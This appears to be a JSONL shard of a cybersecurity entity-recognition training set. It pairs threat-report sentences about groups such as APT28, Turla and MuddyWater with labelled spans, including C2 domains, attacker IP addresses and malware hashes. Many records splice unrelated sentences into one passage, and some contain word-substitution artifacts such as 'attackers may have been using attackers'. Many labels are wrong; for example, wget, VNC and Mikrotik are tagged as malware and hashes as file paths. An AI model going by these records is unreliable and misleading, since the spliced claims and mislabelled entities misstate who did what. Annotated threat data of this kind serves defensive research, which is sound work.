On June 22 , @AnFam17 spotted the same fake browser update leveraging URL shortcuts .", "spans": {"MALWARE: Anubis": [[86, 92]], "ORGANIZATION: Symantec": [[211, 219]], "MALWARE: FIN7 S-APT/GRIFFON": [[325, 343]], "DOMAIN: hpservice-cdn.com": [[346, 363]], "DOMAIN: realtek-cdn.com": [[364, 379]], "DOMAIN: logitech-cdn.com": [[380, 396]], "DOMAIN: pci-cdn.com": [[397, 408]], "DOMAIN: appleservice-cdn.com": [[409, 429]], "DOMAIN: servicebing-cdn.com": [[430, 449]], "ORGANIZATION: @AnFam17": [[465, 473]]}, "info": {"id": "cyberner_stix_train_003311", "source": "cyberner_stix_train"}} {"text": "Between May 2017 and December 2018 , a multi-purpose command tool that has been used by Whitefly was also used in attacks against defense , telecoms , and energy targets in Southeast Asia and Russia . We've found that this group has continued to operate successfully , predominantly in Latin America , since 2014 .", "spans": {"THREAT_ACTOR: Whitefly": [[88, 96]], "ORGANIZATION: defense": [[130, 137]], "ORGANIZATION: telecoms": [[140, 148]], "ORGANIZATION: energy": [[155, 161]]}, "info": {"id": "cyberner_stix_train_003312", "source": "cyberner_stix_train"}} {"text": "That this group is mostly targeting businesses is apparent from the processes they are looking for on a compromised system . 
The most recent Scarlet Mimic attacks we have identified were conducted in 2015 and suggest the group has a significant interest in both Muslim activists and those interested in critiques of the Russian government and Russian President Vladimir Putin .", "spans": {"THREAT_ACTOR: group": [[10, 15]], "ORGANIZATION: businesses": [[36, 46]], "ORGANIZATION: Muslim activists": [[262, 278]], "ORGANIZATION: Russian government": [[320, 338]]}, "info": {"id": "cyberner_stix_train_003313", "source": "cyberner_stix_train"}} {"text": "CTU researchers believe legitimate websites are used to host tools because web proxies categorize the sites as benign .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_003314", "source": "cyberner_stix_train"}} {"text": "INTERNET - Allows the application to open network sockets . FireEye detects this activity across our platforms , including named detection for TONEDEAF , VALUEVAULT , and LONGWATCH . As part of the investigation , Unit 42 researchers were able to identify an interesting characteristic about how the Gorgon Group crew uses shared infrastructure between cybercrime and targeted attacks .", "spans": {"ORGANIZATION: FireEye": [[60, 67]], "MALWARE: TONEDEAF": [[143, 151]], "MALWARE: VALUEVAULT": [[154, 164]], "MALWARE: LONGWATCH": [[171, 180]], "ORGANIZATION: Unit 42": [[214, 221]], "THREAT_ACTOR: Gorgon Group": [[300, 312]], "MALWARE: shared infrastructure": [[323, 344]]}, "info": {"id": "cyberner_stix_train_003315", "source": "cyberner_stix_train"}} {"text": "After that , the Trojan will replace the original /system/bin/ip with a malicious one from the archive ( Game324.res or Game644.res ) . VAMP targeted various types of data from the phones of victims : images , text messages , contacts , and call history , among others . RevengeHotels : e675bdf6557350a02f15c14f386fcc47 . 
These malicious PDF files were rigged with exploits attacking Adobe Reader versions 9 , 10 and 11 , bypassing its sandbox .", "spans": {"TOOL: VAMP": [[136, 140]], "THREAT_ACTOR: RevengeHotels": [[271, 284]], "FILEPATH: e675bdf6557350a02f15c14f386fcc47": [[287, 319]], "MALWARE: malicious PDF files": [[328, 347]], "TOOL: Adobe Reader versions 9 , 10 and 11": [[384, 419]]}, "info": {"id": "cyberner_stix_train_003316", "source": "cyberner_stix_train"}} {"text": "The malware uses smishing , or SMS phishing , to infiltrate target devices , which is a technique that relies on social engineering . Both of the loader’s variants and their various payloads that enSilo analyzed share similar Tactics , Techniques , and Procedures (TTPs) and code associated with APT10 . While the most recent samples observed still use batch scripts and SFX files , the Gamaredon Group has moved aACT from applications like wget , Remote Manipulator MAL , VNC and ChkFlsh.exe .", "spans": {"ORGANIZATION: enSilo": [[196, 202]], "THREAT_ACTOR: APT10": [[296, 301]], "MALWARE: batch scripts": [[353, 366]], "MALWARE: SFX files": [[371, 380]], "THREAT_ACTOR: Gamaredon Group": [[387, 402]], "MALWARE: wget": [[441, 445]], "MALWARE: Remote Manipulator MAL": [[448, 470]], "MALWARE: VNC": [[473, 476]], "MALWARE: ChkFlsh.exe": [[481, 492]]}, "info": {"id": "cyberner_stix_train_003317", "source": "cyberner_stix_train"}} {"text": "End users and enterprises can also benefit from multilayered mobile security solutions such as Trend Micro™ Mobile Security™ . The threat actor used an exploit from the arsenal of the state-sponsored hacker group APT28 . In his history , FIN7 has overlapped several times with Cobalt S-MAL/EmpireMonkey in terms of TTPs . 
This type of attack technique can not be easily mitigated with preventive controls since it is based on the abuse of system features .", "spans": {"ORGANIZATION: Trend Micro™": [[95, 107]], "THREAT_ACTOR: APT28": [[213, 218]], "THREAT_ACTOR: FIN7": [[238, 242]], "MALWARE: Cobalt S-MAL/EmpireMonkey": [[277, 302]]}, "info": {"id": "cyberner_stix_train_003318", "source": "cyberner_stix_train"}} {"text": "Interestingly however , another apparent evasion trick was also attempted - forging of the loaders ’ compilation timestamps .", "spans": {}, "info": {"id": "cyberner_stix_train_003319", "source": "cyberner_stix_train"}} {"text": "There is a function called \" performGlobalAction '' with the description below . But the group has also used Poison Ivy ( PIVY ) , a RAT more commonly associated with threat actors in China — so much so that PIVY has , inaccurately , become synonymous with all APT attacks linked to China . ShadowHammer : aa15eb28292321b586c27d8401703494 . In a recent survey , respondents indicated that 57 of all observed vulnerabilities are more than two years old , with as many as 17 being more than five years old .", "spans": {"THREAT_ACTOR: group": [[89, 94]], "TOOL: Poison Ivy": [[109, 119]], "TOOL: PIVY": [[122, 126], [208, 212]], "TOOL: RAT": [[133, 136]], "THREAT_ACTOR: threat actors": [[167, 180]], "THREAT_ACTOR: ShadowHammer": [[291, 303]], "FILEPATH: aa15eb28292321b586c27d8401703494": [[306, 338]], "VULNERABILITY: observed vulnerabilities": [[399, 423]]}, "info": {"id": "cyberner_stix_train_003320", "source": "cyberner_stix_train"}} {"text": "MOSA is the Palestinian Directorate of Social Development whose mandate is to achieve comprehensive development , social security , and economic growth for Palestinian families , according to publicly available information on this ministry . Since January 2013 , we've been on the lookout for a possible RedOctober comeback . 
This interface sometimes runs on their personal attack system , which is typically in Shanghai . Our analysis indicates that attackers may have been using attackers since mid-2022 .", "spans": {"ORGANIZATION: MOSA": [[0, 4]], "THREAT_ACTOR: RedOctober": [[304, 314]], "THREAT_ACTOR: attackers": [[451, 460]]}, "info": {"id": "cyberner_stix_train_003321", "source": "cyberner_stix_train"}} {"text": "CONNECTION TO CHINA Chinese server infrastructure : FakeSpy applications send stolen information to C2 domains with .club TLDs and URLs ending with /servlet/ [ C2 Command ] ( mentioned above in the “ Stealing Sensitive Information ” section ) . MuddyWater is widely regarded as a long-lived APT group in the Middle East . APT15 then used a tool known as RemoteExec .", "spans": {"MALWARE: FakeSpy": [[52, 59]], "THREAT_ACTOR: MuddyWater": [[245, 255]], "THREAT_ACTOR: APT15": [[322, 327]], "MALWARE: RemoteExec": [[354, 364]]}, "info": {"id": "cyberner_stix_train_003322", "source": "cyberner_stix_train"}} {"text": "This new XLoader variant poses as a security app for Android devices , and uses a malicious iOS profile to affect iPhone and iPad devices . The admin@338 's Dropbox accounts have also been found to contain a different backdoor dubbed BUBBLEWRAP . test1.hta reserved . By selecting these links , you will be leaving NIST webspace .", "spans": {"MALWARE: XLoader": [[9, 16]], "SYSTEM: Android": [[53, 60]], "SYSTEM: iOS": [[92, 95]], "SYSTEM: iPhone": [[114, 120]], "SYSTEM: iPad": [[125, 129]], "THREAT_ACTOR: admin@338": [[144, 153]], "TOOL: BUBBLEWRAP": [[234, 244]], "FILEPATH: test1.hta": [[247, 256]], "ORGANIZATION: NIST": [[315, 319]]}, "info": {"id": "cyberner_stix_train_003323", "source": "cyberner_stix_train"}} {"text": "MainActivity registers BootComplete with a boot event , so that whenever the device is booted , BootComplete gets triggered . As the CnC server , Silence use CnC-3 server running Windows , from which they send commands to download additional modules . 
Some of the teams publicly known today include Iranian Cyber Army , Ashiyane , Islamic Cyber Resistance Group , Izz ad-Din al-Qassam Cyber Fighters , Parastoo , Shabgard , Iran Black Hats and many others 9 .", "spans": {"THREAT_ACTOR: Silence": [[146, 153]], "TOOL: CnC-3 server": [[158, 170]], "THREAT_ACTOR: Cyber Army": [[307, 317]], "THREAT_ACTOR: Ashiyane": [[320, 328]], "THREAT_ACTOR: Cyber Resistance Group": [[339, 361]], "THREAT_ACTOR: Izz ad-Din al-Qassam Cyber Fighters": [[364, 399]], "THREAT_ACTOR: Parastoo": [[402, 410]], "THREAT_ACTOR: Shabgard": [[413, 421]], "THREAT_ACTOR: Iran Black Hats": [[424, 439]]}, "info": {"id": "cyberner_stix_train_003324", "source": "cyberner_stix_train"}} {"text": "In the latter case however , the group appear to have also simultaneously developed an entirely new loader , which we first observed being used in conjunction with CosmicDuke during the spring of 2015 .", "spans": {"MALWARE: CosmicDuke": [[164, 174]]}, "info": {"id": "cyberner_stix_train_003325", "source": "cyberner_stix_train"}} {"text": "At the end of August 2018 , the Sednit group launched a spearphishing email campaign where it distributed shortened URLs that delivered the first stage of Zebrocy components .", "spans": {"THREAT_ACTOR: Sednit": [[32, 38]], "TOOL: email": [[70, 75]], "MALWARE: Zebrocy": [[155, 162]]}, "info": {"id": "cyberner_stix_train_003326", "source": "cyberner_stix_train"}} {"text": "Falcon Intelligence has medium-high confidence that the GRIM SPIDER threat actors are operating out of Russia . Adobe Flash Player exploit .", "spans": {"ORGANIZATION: Falcon Intelligence": [[0, 19]], "TOOL: Adobe Flash Player": [[112, 130]], "VULNERABILITY: exploit": [[131, 138]]}, "info": {"id": "cyberner_stix_train_003327", "source": "cyberner_stix_train"}} {"text": "] com . The tool investigates the Local Security Authority Subsystem memory space in order to find , decrypt and display retrieved passwords . 
APT40 was previously reported as TEMP.Periscope and TEMP.Jumper .", "spans": {"MALWARE: tool": [[12, 16]], "THREAT_ACTOR: APT40": [[143, 148]], "THREAT_ACTOR: TEMP.Periscope": [[176, 190]], "THREAT_ACTOR: TEMP.Jumper": [[195, 206]]}, "info": {"id": "cyberner_stix_train_003328", "source": "cyberner_stix_train"}} {"text": "Considering the other malicious behaviors of XLoader , this added operation could be very dangerous as threat actors can use it to perform targeted attacks . With this in mind , this week we are providing some indicators for a China based adversary who we crypt as \" NUMBERED PANDA \" Numbered Panda has a long list of high-profile victims and is known by a number of names including : DYNCALC , IXESHE , JOY RAT , APT-12 , etc . Any other IP address will set the receive mode to ping, although the server-side software suggests 199.250.250.99 will be . RDP and phishing are two of the most popular initial ransomware attack vectors , and cybercriminals approach in leveraging these techniques has not changed much over the years .", "spans": {"MALWARE: XLoader": [[45, 52]], "THREAT_ACTOR: NUMBERED PANDA": [[267, 281]], "THREAT_ACTOR: Numbered Panda": [[284, 298]], "THREAT_ACTOR: DYNCALC": [[385, 392]], "THREAT_ACTOR: IXESHE": [[395, 401]], "THREAT_ACTOR: JOY RAT": [[404, 411]], "THREAT_ACTOR: APT-12": [[414, 420]], "IP_ADDRESS: 199.250.250.99": [[528, 542]], "THREAT_ACTOR: cybercriminals": [[638, 652]]}, "info": {"id": "cyberner_stix_train_003329", "source": "cyberner_stix_train"}} {"text": "All the IP addresses belong to the same company Hetzner , an IP-hosting firm in Germany . We recently noticed the group behind MuddyWater that appear to be targeting government bodies , military entities , telcos and educational institutions in Jordan , Turkey , Azerbaijan and Pakistan , in addition to the continuous targeting of Iraq and Saudi Arabia , other victims were also detected in Mali , Austria , Russia , Iran and Bahrain. . 
This particular VBScript payload beacons to domain bafunpda.xyz , which is also used by the KHRAT S-MAL Trojan E-MAL listed above in Table 2 . COSMICENERGY Possibly Associated With Russian Government - Funded Power Disruption and Emergency Response Exercises During our analysis of COSMICENERGY , we identified a comment in the code that indicated the sample uses a module associated with a project named “ Solar Polygon ” ( Figure 2 ) .", "spans": {"ORGANIZATION: Hetzner": [[48, 55]], "THREAT_ACTOR: group": [[114, 119]], "THREAT_ACTOR: MuddyWater": [[127, 137]], "ORGANIZATION: government bodies": [[166, 183]], "ORGANIZATION: military entities": [[186, 203]], "ORGANIZATION: educational institutions": [[217, 241]], "TOOL: VBScript": [[454, 462]], "DOMAIN: bafunpda.xyz": [[489, 501]], "MALWARE: KHRAT S-MAL": [[530, 541]], "MALWARE: Trojan E-MAL": [[542, 554]], "MALWARE: COSMICENERGY": [[581, 593], [720, 732]], "ORGANIZATION: Russian Government": [[619, 637]]}, "info": {"id": "cyberner_stix_train_003330", "source": "cyberner_stix_train"}} {"text": "First , we launched a banking app and entered the credentials there . However , it is likely the same scripts are used more globally against many traditional Turla targets in Western Europe and the Middle East . Working with U.S. government partners , DHS and FBI identified Internet Protocol ( IP ) addresses and other indicators of compromise ( IOCs ) associated with a remote administration tool ( RAT ) used by the North Korean government—commonly known as FALLCHILL .", "spans": {"THREAT_ACTOR: Turla": [[158, 163]], "ORGANIZATION: government": [[230, 240]], "ORGANIZATION: DHS": [[252, 255]], "ORGANIZATION: FBI": [[260, 263]], "MALWARE: remote administration tool": [[372, 398]], "MALWARE: RAT": [[401, 404]], "MALWARE: FALLCHILL": [[461, 470]]}, "info": {"id": "cyberner_stix_train_003331", "source": "cyberner_stix_train"}} {"text": "By monitoring the package installation broadcast event , XLoader can start their packages . 
The actors behind this campaign we call LUCKY ELEPHANT use doppelganger webpages to mimic legitimate entities such as foreign governments , telecommunications , and military . At the next startup , the software will directly load the configuration from the just created key .", "spans": {"MALWARE: XLoader": [[57, 64]], "THREAT_ACTOR: LUCKY ELEPHANT": [[132, 146]], "TOOL: doppelganger webpages": [[151, 172]], "ORGANIZATION: foreign governments": [[210, 229]], "ORGANIZATION: telecommunications": [[232, 250]], "ORGANIZATION: military": [[257, 265]]}, "info": {"id": "cyberner_stix_train_003332", "source": "cyberner_stix_train"}} {"text": "The next stage payload ( e1953fa319cc11c2f003ad0542bca822 ) , downloaded from this loader , is similar to the .NET downloader in the WFCWallet case .", "spans": {"FILEPATH: e1953fa319cc11c2f003ad0542bca822": [[25, 57]], "TOOL: .NET": [[110, 114]], "TOOL: WFCWallet": [[133, 142]]}, "info": {"id": "cyberner_stix_train_003333", "source": "cyberner_stix_train"}} {"text": "First Twitter‑controlled Android botnet discovered Detected by ESET as Android/Twitoor , this malware is unique because of its resilience mechanism . On November 29 , 2018 , Scattered Canary sent an attack email to Agari CFO Raymond Lim , enquiring as to his availability to send out a domestic wire transfer . 
Our analysis shows that the cybercriminals behind the attack against an online casino in Central America , and several other targets in late-2017 , were most likely the infamous Lazarus hacking group .", "spans": {"SYSTEM: Twitter‑controlled": [[6, 24]], "SYSTEM: Android": [[25, 32]], "ORGANIZATION: ESET": [[63, 67]], "MALWARE: Android/Twitoor": [[71, 86]], "THREAT_ACTOR: Scattered Canary": [[174, 190]], "THREAT_ACTOR: cybercriminals": [[339, 353]], "THREAT_ACTOR: Lazarus hacking group": [[489, 510]]}, "info": {"id": "cyberner_stix_train_003334", "source": "cyberner_stix_train"}} {"text": "For more information on the overall capabilities of the malware , please review IBM 's ongoing research .", "spans": {"ORGANIZATION: IBM": [[80, 83]]}, "info": {"id": "cyberner_stix_train_003335", "source": "cyberner_stix_train"}} {"text": "Within six hours of entering the environment , the threat actors compromised multiple systems and stole credentials for the entire domain .", "spans": {}, "info": {"id": "cyberner_stix_train_003336", "source": "cyberner_stix_train"}} {"text": "Further tracking of the Lazarus’s activities has enabled Kaspersky researchers to discover a new operation , active since at least November 2018 , which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers . 
The malware then builds two DLLs in memory – they are 32 and 64-bit DLLs that have identical functionality .", "spans": {"THREAT_ACTOR: Lazarus’s": [[24, 33]], "ORGANIZATION: Kaspersky": [[57, 66]], "TOOL: PowerShell": [[162, 172]], "ORGANIZATION: Apple customers": [[229, 244]], "FILEPATH: malware": [[251, 258]], "FILEPATH: DLLs": [[275, 279]]}, "info": {"id": "cyberner_stix_train_003337", "source": "cyberner_stix_train"}} {"text": "The injected code copies xxxx.exe to %System%\\winsys.exe and connects to the Command and Control ( C&C ) server on TCP port 80 .", "spans": {"FILEPATH: xxxx.exe": [[25, 33]], "FILEPATH: %System%\\winsys.exe": [[37, 56]], "TOOL: Command and Control": [[77, 96]], "TOOL: C&C": [[99, 102]]}, "info": {"id": "cyberner_stix_train_003338", "source": "cyberner_stix_train"}} {"text": "Our visibility into APT28 ’s operations , which date to at least 2007 , has allowed us to understand the group ’s malware , operational changes , and motivations .", "spans": {"THREAT_ACTOR: APT28": [[20, 25]]}, "info": {"id": "cyberner_stix_train_003339", "source": "cyberner_stix_train"}} {"text": "Release_Time : 2019-12-04", "spans": {}, "info": {"id": "cyberner_stix_train_003340", "source": "cyberner_stix_train"}} {"text": "The ‘ onload1 ’ function parses the response data from the request to the C2 URL using regular expressions .", "spans": {"TOOL: C2": [[74, 76]]}, "info": {"id": "cyberner_stix_train_003341", "source": "cyberner_stix_train"}} {"text": "Retrieve Keylogger logs .", "spans": {}, "info": {"id": "cyberner_stix_train_003342", "source": "cyberner_stix_train"}} {"text": "User must open the Microsoft Word email attachment ;", "spans": {"ORGANIZATION: Microsoft": [[19, 28]], "TOOL: Word": [[29, 33]], "TOOL: email": [[34, 39]]}, "info": {"id": "cyberner_stix_train_003343", "source": "cyberner_stix_train"}} {"text": "Port 6207 : Viber extraction service . stolen certificates being used maliciously occurred in early 2014 . 
Potentially fake documents that appear to be issued by the Palestinian government . The alert described emails that delivered an Evernotethemed lure to entice targeted recipients into downloading a trojan .", "spans": {"SYSTEM: Viber": [[12, 17]], "ORGANIZATION: Palestinian government": [[166, 188]]}, "info": {"id": "cyberner_stix_train_003344", "source": "cyberner_stix_train"}} {"text": "Only later is the malicious code introduced , through an update . Barium Defendants install the malicious credential stealing and injection tool known as \" Win32/RibDoor.A!dha \" . Once an infected machine connects , you see its information displayed in a selection box at the top . An attacker could exploit these issues by tricking a user into opening a specially crafted PDF document or , if the user has the browser extension enabled , by visiting a malicious web page :", "spans": {"THREAT_ACTOR: Barium": [[66, 72]], "TOOL: Win32/RibDoor.A!dha": [[156, 175]], "THREAT_ACTOR: attacker": [[285, 293]]}, "info": {"id": "cyberner_stix_train_003345", "source": "cyberner_stix_train"}} {"text": "In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . 
And the dropper execute the iassvcs.exe to make a side loading and make the persistence .", "spans": {"MALWARE: RTF attachments": [[44, 59]], "VULNERABILITY: CVE-2017-0199": [[124, 137]], "FILEPATH: dropper": [[148, 155]], "FILEPATH: iassvcs.exe": [[168, 179]]}, "info": {"id": "cyberner_stix_train_003346", "source": "cyberner_stix_train"}} {"text": "Figure 4 details how many times each stolen certificate was used in a given month .", "spans": {}, "info": {"id": "cyberner_stix_train_003347", "source": "cyberner_stix_train"}} {"text": "One archive sample analyzed by CTU researchers contained a legitimate PDF file , a benign image of interest to targets , and an HttpBrowser installer disguised as an image file .", "spans": {"ORGANIZATION: CTU": [[31, 34]], "TOOL: PDF": [[70, 73]], "MALWARE: HttpBrowser": [[128, 139]], "TOOL: installer": [[140, 149]]}, "info": {"id": "cyberner_stix_train_003348", "source": "cyberner_stix_train"}} {"text": "Malware installation , persistence , and activation .", "spans": {}, "info": {"id": "cyberner_stix_train_003349", "source": "cyberner_stix_train"}} {"text": "The document exploited CVE-2012-0158 and will decode and write an executable to disk upon infection . In March 2017 , Wikileaks published details about an exploit affecting Mikrotik called ChimayRed .", "spans": {"VULNERABILITY: CVE-2012-0158": [[23, 36]], "ORGANIZATION: Wikileaks": [[118, 127]], "VULNERABILITY: exploit": [[155, 162]], "MALWARE: Mikrotik": [[173, 181]], "MALWARE: ChimayRed": [[189, 198]]}, "info": {"id": "cyberner_stix_train_003350", "source": "cyberner_stix_train"}} {"text": "Lollipop has 7 percent , Ice Cream Sandwich has 2 percent , and Marshmallow has 1 percent . WCry uses a combination of the RSA and AES algorithms to encrypt files . APT33 : 64.251.19.232 [REDACTED].ddns.net . 
In essence , this provides the threat actor unrestricted access to the account .", "spans": {"SYSTEM: Lollipop": [[0, 8]], "SYSTEM: Ice Cream Sandwich": [[25, 43]], "SYSTEM: Marshmallow": [[64, 75]], "TOOL: WCry": [[92, 96]], "TOOL: RSA": [[123, 126]], "TOOL: AES": [[131, 134]], "THREAT_ACTOR: APT33": [[165, 170]], "IP_ADDRESS: 64.251.19.232": [[173, 186]], "DOMAIN: [REDACTED].ddns.net": [[187, 206]]}, "info": {"id": "cyberner_stix_train_003351", "source": "cyberner_stix_train"}} {"text": "Researchers showcased a potential malware lifecycle which started with spear phishing and eventually led to the deployment of the disk-wiping malware known as Shamoon .", "spans": {"MALWARE: Shamoon": [[159, 166]]}, "info": {"id": "cyberner_stix_train_003352", "source": "cyberner_stix_train"}} {"text": "] top/ These permutations of TLDs and canonical domains incorporating the legitimate domain expected by the targeted banking customers exemplifies recent trends in social engineering by threat actors . One notable aspect of the campaign was the actors' ability to impersonate VPN applications , such as Cisco Adaptive Security Appliance (ASA) products , to perform MitM attacks . APT28 has been active since at least 2004 .", "spans": {"THREAT_ACTOR: actors'": [[245, 252]], "TOOL: VPN applications": [[276, 292]], "TOOL: Adaptive Security Appliance": [[309, 336]], "THREAT_ACTOR: APT28": [[380, 385]]}, "info": {"id": "cyberner_stix_train_003353", "source": "cyberner_stix_train"}} {"text": "As we described in Silence: Moving into the darkside report , Silence has experience with theft using compromised card processing systems . 
According to our statistics , as of the beginning of 2015 this botnet encompassed over 250 000 infected devices worldwide including infecting more than 100 financial institutions with 80% of them from the top 20 list .", "spans": {"THREAT_ACTOR: Silence:": [[19, 27]], "THREAT_ACTOR: Silence": [[62, 69]], "FILEPATH: botnet encompassed": [[203, 221]], "ORGANIZATION: financial institutions": [[296, 318]]}, "info": {"id": "cyberner_stix_train_003354", "source": "cyberner_stix_train"}} {"text": "The first observed samples of the MiniDuke backdoor component are from May 2011 .", "spans": {"MALWARE: MiniDuke backdoor": [[34, 51]]}, "info": {"id": "cyberner_stix_train_003355", "source": "cyberner_stix_train"}} {"text": "What do I need to do ? Leafminer also utilized Process Doppelganging , a detection evasion technique first discussed at the Black Hat EU conference last year . We have tried informing them several times , through various channels , since early February , but without apparent success . If network logs were analyzed individually across that journey , it is likely that all requests were either in compliance with the policies embedded into the firewalls at every node , or some unpatched vulnerability prevented a control action against unauthorized data transfers .", "spans": {"THREAT_ACTOR: Leafminer": [[23, 32]], "VULNERABILITY: some unpatched vulnerability prevented a control action against unauthorized data transfers": [[473, 564]]}, "info": {"id": "cyberner_stix_train_003356", "source": "cyberner_stix_train"}} {"text": "In order to achieve this adaptability , the operator has the capability to remotely load plugins , inject scripts and even compile new .NET code that can be executed . At the time of analysis , the subdomains did not host a website; however , based on BITTER APT group’s targeting patterns , it is highly likely that they were created to host faux login phishing pages designed to steal user’s credentials . 
This coupled with the timing of operations – which coincides with Iranian working hours – and the use of multiple Iranian hacker tools and name servers bolsters our assessment that APT33 may have operated on behalf of the Iranian government .", "spans": {"SYSTEM: .NET": [[135, 139]], "THREAT_ACTOR: BITTER APT": [[252, 262]], "MALWARE: name servers": [[547, 559]], "THREAT_ACTOR: APT33": [[589, 594]]}, "info": {"id": "cyberner_stix_train_003357", "source": "cyberner_stix_train"}} {"text": "] com/api/s2s/tracks/ and is used for activation . Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . In September 2018 , we found evidence of Seedworm and the espionage group APT28 ( aka Swallowtail , Fancy Bear ) , on a computer within the Brazil-based embassy of an oil-producing nation .", "spans": {"ORGANIZATION: Kaspersky": [[51, 60]], "THREAT_ACTOR: group": [[71, 76]], "VULNERABILITY: Adobe Flash Player zero-day vulnerability": [[94, 135]], "VULNERABILITY: CVE-2016-4117": [[138, 151]], "TOOL: FinSpy": [[198, 204]], "THREAT_ACTOR: Seedworm": [[306, 314]], "THREAT_ACTOR: APT28": [[339, 344]], "THREAT_ACTOR: Swallowtail": [[351, 362]], "THREAT_ACTOR: Fancy Bear": [[365, 375]], "ORGANIZATION: embassy": [[418, 425]]}, "info": {"id": "cyberner_stix_train_003358", "source": "cyberner_stix_train"}} {"text": "In the beginning , this threat group mainly targeted Asian countries . The last piece is the newly discovered CopyPaste group , who targeted financial entities and companies in one African country , which lead us to think that CopyPaste was associated with cybermercenaries or a training center . 
The Ke3chang group also used keyloggers and their own .NET tool to enumerate folders and dump data from Microsoft Exchange mailboxes .", "spans": {"THREAT_ACTOR: CopyPaste": [[110, 119]], "ORGANIZATION: financial": [[141, 150]], "ORGANIZATION: companies": [[164, 173]], "ORGANIZATION: training center": [[279, 294]], "THREAT_ACTOR: Ke3chang group": [[301, 315]], "MALWARE: keyloggers": [[326, 336]], "MALWARE: .NET tool": [[351, 360]], "ORGANIZATION: Microsoft": [[401, 410]]}, "info": {"id": "cyberner_stix_train_003359", "source": "cyberner_stix_train"}} {"text": "Correspondence of other individuals targeted in the same phishing campaign , including former Secretary of State Colin Powell and Clinton campaign staffer William Rinehart , were published on the “ DC Leaks ” website .", "spans": {}, "info": {"id": "cyberner_stix_train_003360", "source": "cyberner_stix_train"}} {"text": "After scanning the QR code and installing a component downloaded from the link , the user infects his smartphone with the Trojan program that boasts functionality that is of great interest to the attackers . Turla operators could use an already-compromised machine in the network of the victim 's organization to perform a local MitM attack . To illustrate the functionality of main ZxShell module , Let ’s take a look at the following sample : “ So good luck , I ’m sure we ’ll talk again soon , but for now , I ve got better things in the oven , ” Harrison wrote to Biderman after his employment contract with Ashley Madison was terminated .", "spans": {"MALWARE: ZxShell": [[383, 390]], "THREAT_ACTOR: Harrison": [[550, 558]], "ORGANIZATION: Biderman": [[568, 576]], "ORGANIZATION: Ashley Madison": [[612, 626]]}, "info": {"id": "cyberner_stix_train_003361", "source": "cyberner_stix_train"}} {"text": "The attacks use multiple exploits in an attempt to gain root access on a device . 
Notably , after the first SMB packet sent to the victim 's IP address , WannaCry sends two additional packets to the victim containing the hard-coded IP addresses 192.168.56.20 and 172.16.99.5 . APT33 : 64.251.19.217 [REDACTED].myftp.org . Additionally we observed the DPRK threat actor log directly into a Pyongyang IP , from one of their jump boxes .", "spans": {"TOOL: WannaCry": [[154, 162]], "THREAT_ACTOR: APT33": [[277, 282]], "IP_ADDRESS: 64.251.19.217": [[285, 298]], "DOMAIN: [REDACTED].myftp.org": [[299, 319]], "THREAT_ACTOR: DPRK threat actor": [[351, 368]], "SYSTEM: a Pyongyang IP": [[387, 401]]}, "info": {"id": "cyberner_stix_train_003362", "source": "cyberner_stix_train"}} {"text": "Since Ryuk 's appearance in August , the threat actors operating it have netted over 705.80 BTC across 52 transactions for a total current value of $3,701,893.98 USD . These codes are often leveraged in the malware used by coordinated targeted attackers to differentiate victims that were successfully compromised from different target sets .", "spans": {"TOOL: Ryuk": [[6, 10]]}, "info": {"id": "cyberner_stix_train_003363", "source": "cyberner_stix_train"}} {"text": "This malware family is known as \" PittyTiger \" by the anti-virus community . 
Operation Ghoul is one of the many attacks in the wild targeting industrial , manufacturing and engineering organizations , Kaspersky Lab recommends users to be extra cautious while checking and opening emails and attachments .", "spans": {"THREAT_ACTOR: PittyTiger": [[34, 44]], "ORGANIZATION: anti-virus community": [[54, 74]], "ORGANIZATION: industrial": [[142, 152]], "ORGANIZATION: manufacturing": [[155, 168]], "ORGANIZATION: engineering organizations": [[173, 198]], "ORGANIZATION: Kaspersky Lab": [[201, 214]]}, "info": {"id": "cyberner_stix_train_003364", "source": "cyberner_stix_train"}} {"text": "University faculty specializing in aeronautical engineering and research .", "spans": {}, "info": {"id": "cyberner_stix_train_003365", "source": "cyberner_stix_train"}} {"text": "As of this publication , CTU researchers have not discovered how TG-3390 keeps track of the details associated with its compromised assets and credentials .", "spans": {"ORGANIZATION: CTU": [[25, 28]], "THREAT_ACTOR: TG-3390": [[65, 72]]}, "info": {"id": "cyberner_stix_train_003366", "source": "cyberner_stix_train"}} {"text": "The first variant involves social engineering the target into downloading a trojanized app . Thus , Turla operators had access to some highly sensitive information ( such as emails sent by the German Foreign Office staff ) for almost a year . The service ’s existence is verified with the ServiceExists function , which attempts to open the relative registry sub-key in HKLM\\SYSTEM\\CurrentControlSet\\Services . 
CrowdStrike incident responders found that renamed Plink and AnyDesk executable creation timestamps on affected backend Exchange servers were closely correlated with PowerShell execution events in the Remote PowerShell logs , indicating the threat actor leveraged the newly discovered exploit chain to drop other tooling for persistent access to the affected Exchange servers .", "spans": {"THREAT_ACTOR: Turla": [[100, 105]], "ORGANIZATION: German Foreign Office staff": [[193, 220]]}, "info": {"id": "cyberner_stix_train_003367", "source": "cyberner_stix_train"}} {"text": "The main purpose of this module is providing reverse shell features on the device by connecting with the C & C server ’ s socket . Therefore , it is clear that the OceanLotus group works during weekdays and takes a break during the weekends . The group behind the campaign has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia . menuPass : Stone Panda , APT10 , Red Apollo , CVNX , HOGFISH . menuPass is a threat group that appears to originate from China and has been active since approximately 2009 .", "spans": {"THREAT_ACTOR: OceanLotus": [[164, 174]], "THREAT_ACTOR: menuPass": [[429, 437], [492, 500]], "THREAT_ACTOR: Stone Panda": [[440, 451]], "THREAT_ACTOR: APT10": [[454, 459]], "THREAT_ACTOR: Red Apollo": [[462, 472]], "THREAT_ACTOR: CVNX": [[475, 479]], "THREAT_ACTOR: HOGFISH": [[482, 489]]}, "info": {"id": "cyberner_stix_train_003368", "source": "cyberner_stix_train"}} {"text": "The team has encountered different versions of the malware over time as it has rapidly evolved . Previous reports have discussed Bisonal malware used in attacks against Japan , South Korea and Russia . 
